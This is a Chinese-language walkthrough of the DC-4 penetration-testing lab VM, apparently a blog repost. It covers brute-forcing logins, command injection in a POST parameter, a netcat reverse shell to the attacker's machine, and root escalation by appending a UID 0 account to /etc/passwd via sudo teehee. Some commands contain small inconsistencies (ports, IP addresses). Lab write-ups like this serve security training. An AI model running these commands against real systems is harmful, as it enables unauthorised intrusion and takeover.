前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布

DC-4

作者头像
黑白天安全
发布2020-04-28 11:02:46
7100
发布2020-04-28 11:02:46
举报
文章被收录于专栏:黑白天安全团队

DC-4 DC-4是另一个专门建造的脆弱实验室,目的是获得渗透测试领域的经验。

与以前的DC版本不同,这个版本主要是为初学者/中间用户设计的。 只有一面旗帜,但技术上来说,有多个入口,就像上次一样,没有线索。

环境

代码语言:javascript
复制
DC-4  192.168.236.142
kali  192.168.236.133

信息收集

nmap直接扫一下吧。

代码语言:javascript
复制
nmap -A -p - 192.168.236.142

可以看到开了80 / tcp http 22 / tcp ssh。打开80端口看看。

但是没有登录限制,尝试爆破爆破一下吧。

burp或者hyda爆破吧,这里使用burp suite爆破吧。

爆破出来账号是admin密码happy。登陆看看。

看看commd中有几个命令。分别执行看看。

看到这里就要知道了可能存在任意远程命令执行中断。brup抓一下包吧。

看看数据包。

代码语言:javascript
复制
POST /command.php HTTP/1.1

Host: 192.168.236.142

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.236.142/command.php

Content-Type: application/x-www-form-urlencoded

Content-Length: 22

Connection: close

Cookie: PHPSESSID=f4usv4i3pnifd66g1pg34l5830

Upgrade-Insecure-Requests: 1



radio=ls+-l&submit=Run

注意看radio = ls + -l,好的。

whoami命令看看。

可以执行。并返回数据。我们可以反弹个shell吧。

代码语言:javascript
复制
kali中 nc -lvvp 1234  监听7777端口,接收反弹回来的shell。
radio=nc +-e +/bin/sh 192.168.236.133a +1234 &submit=Run

ok,shell回来了。我们使用python来开一个标准的shell吧。

为什么是python?因为所有的Linux中基本都会有python。

代码语言:javascript
复制
python -c 'import pty;pty.spawn("/bin/bash")'

拿到一个标准的shell。信息收集一波。

翻来覆去,在/ home / jim中找到一份密码。

来吧,我们使用hyda来爆破jim的ssh登录密码吧。

代码语言:javascript
复制
hydra  -l jim -P /home/l/桌面/123.txt ssh://192.168.236.143

爆破出来了。jim的密码是jibril04。

成功登录上去jim。

ls -l看看

是要提权的。

代码语言:javascript
复制
You have new mail in /var/mail/jim 你有一个新的邮件在

我们去看看是什么嘛。

su到查尔斯拿到一查尔斯账号的密码^ xHhA&hvim0y。

成功登录到charles账号。

信息收集一波发现可以免密码使用sudo / usr / bin / teehee

cd / usr / bin然后teehee --help看看。

ok。有想法了。我们就使用teehee -a把一个账号写进到/ etc / passwd上,这个用户拥有root权限,然后在切换到这个用户即可。

代码语言:javascript
复制
 echo 命令与 sudo 命令配合使用,可以实现向那些只有系统管理员才有权限操作的文件中写入信息
代码语言:javascript
复制
[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]

ok构建命令admin:123456:0:0:123::/bin/sh gid:0就是root然后登录shell是/ bin / sh。

最后语句是

代码语言:javascript
复制
echo "admin:123:0:0:123::/bin/bash" | sudo teehee -a /etc/passwd

我们看看登录一下admin吧.ok拿到flag

88 dc-5见。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-04-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 黑白天实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
访问管理
访问管理(Cloud Access Management,CAM)可以帮助您安全、便捷地管理对腾讯云服务和资源的访问。您可以使用CAM创建子用户、用户组和角色,并通过策略控制其访问范围。CAM支持用户和角色SSO能力,您可以根据具体管理场景针对性设置企业内用户和腾讯云的互通能力。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档